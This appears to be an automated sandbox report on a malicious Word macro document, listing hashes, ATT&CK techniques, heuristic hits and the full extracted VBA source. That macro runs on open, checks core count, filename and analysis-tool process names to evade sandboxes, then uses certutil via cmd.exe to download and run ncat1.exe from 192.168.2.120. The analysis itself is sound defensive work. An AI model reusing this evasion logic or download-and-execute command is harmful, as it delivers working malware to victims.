Office (OOXML) malware analysis — malicious · d1d46a8f7986576b

MALICIOUS

Office (OOXML)

20.6 KB Created: 2021-06-03 14:32:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-06-13

MD5: 935d5194642859f8baab87dc8b769a4b SHA-1: 51d934deebd603ae91cffbb4bb53c542c632fba6 SHA-256: d1d46a8f7986576b9c651303d9e390d6e09ad0137cff190d6255bdf554ff9aca

430 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059.003 Windows Command Shell T1204.002 Malicious File T1071.001 Web Protocols

The sample is a malicious OOXML document containing VBA macros. The AutoOpen macro executes a series of checks, including virtual machine detection and specific filename verification, before potentially executing further actions. The presence of WScript.Shell, Shell(), cmd.exe references, and the ClamAV detection signature 'Win.Downloader.CertutilURLCache-6335698-0' strongly indicate a downloader or droppper functionality.

Heuristics 10

ClamAV: Win.Downloader.CertutilURLCache-6335698-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Downloader.CertutilURLCache-6335698-0
VBA project inside OOXML medium 7 related findings OOXML_VBA

Document contains a VBA project — VBA macros present

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

        Dim objShell
        Set objShell = CreateObject("WScript.Shell")
        objShell.Run "cmd.exe /c certutil.exe -urlcache -split -f http://192.168.2.120/ncat1.exe c:\Users\win\ncat2.exe && c:\Users\win\ncat2.exe"

LOLBin reference in VBA critical OLE_VBA_LOLBIN

LOLBin reference in VBA

Matched line in script

        Set objShell = CreateObject("WScript.Shell")
        objShell.Run "cmd.exe /c certutil.exe -urlcache -split -f http://192.168.2.120/ncat1.exe c:\Users\win\ncat2.exe && c:\Users\win\ncat2.exe"

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

        Dim objShell
        Set objShell = CreateObject("WScript.Shell")
        objShell.Run "cmd.exe /c certutil.exe -urlcache -split -f http://192.168.2.120/ncat1.exe c:\Users\win\ncat2.exe && c:\Users\win\ncat2.exe"

GetObject call high OLE_VBA_GETOBJ

GetObject call

Matched line in script

    Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
    Set colItems = objWMIService.ExecQuery("Select * from Win32_Processor", , 48)

cmd.exe reference in VBA high OLE_VBA_CMD

cmd.exe reference in VBA

Matched line in script

        Set objShell = CreateObject("WScript.Shell")
        objShell.Run "cmd.exe /c certutil.exe -urlcache -split -f http://192.168.2.120/ncat1.exe c:\Users\win\ncat2.exe && c:\Users\win\ncat2.exe"

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://192.168.2.120/ncat1.exe In document text (OOXML body / shared strings)
- http://1�92.168.�In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	2398 bytes
SHA-256: `0aa474d84df52fd5a0717544dea5ebb798287b921a3a70f1824e907ca1aa26da`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "NewMacros" Sub AutoOpen() Dim i badCores = 0 Set objWMIService = GetObject("winmgmts:\\.\root\cimv2") Set colItems = objWMIService.ExecQuery("Select * from Win32_Processor", , 48) For Each objItem In colItems If objItem.NumberOfCores < 3 Then badCores = True End If Next If badCores = True Then i = 1 Else checkPreciseFileName End If End Sub Private Function MSG() 'Sub MSG() MsgBox ("TEST") End Function Public Sub checkPreciseFileName() 'MsgBox "[] Checking Precise Filename ..." badName = False If ActiveDocument.Name <> "certutil2_0_58_only_certutil_TEST2_cores_exact_filename_badtask.docm" Then badName = True End If If badName Then i = 1 'MsgBox "DETECTED" Else checkTasks 'MsgBox "OK" End If End Sub Public Sub checkTasks() 'printMsg "[] Checking Application.Tasks.Name ..." badTask = False 'badTaskNames = Array("vbox", "vmware", "vxstream", "autoit", "vmtools", "tcpview", "wireshark", "process explorer", "visual basic", "fiddler") badTaskNames = Array("fiddler", "vbox", "vmware", "vxstream", "autoit", "vmtools", "tcpview", "wireshark", "process explorer") 'badTaskNames = Array("visual basic") For Each Task In Application.Tasks For Each badTaskName In badTaskNames If InStr(LCase(Task.Name), badTaskName) > 0 Then badTask = True End If Next Next If badTask Then MsgBox "DETECTED" Else Dim objShell Set objShell = CreateObject("WScript.Shell") objShell.Run "cmd.exe /c certutil.exe -urlcache -split -f http://192.168.2.120/ncat1.exe c:\Users\win\ncat2.exe && c:\Users\win\ncat2.exe" End If End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	21504 bytes
SHA-256: `9a59665c7862deac7ba462e3aae225cd3f9d909ebcc90dc8a934fa5683e9f9a7`
Detection ClamAV: Win.Downloader.CertutilURLCache-6335698-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.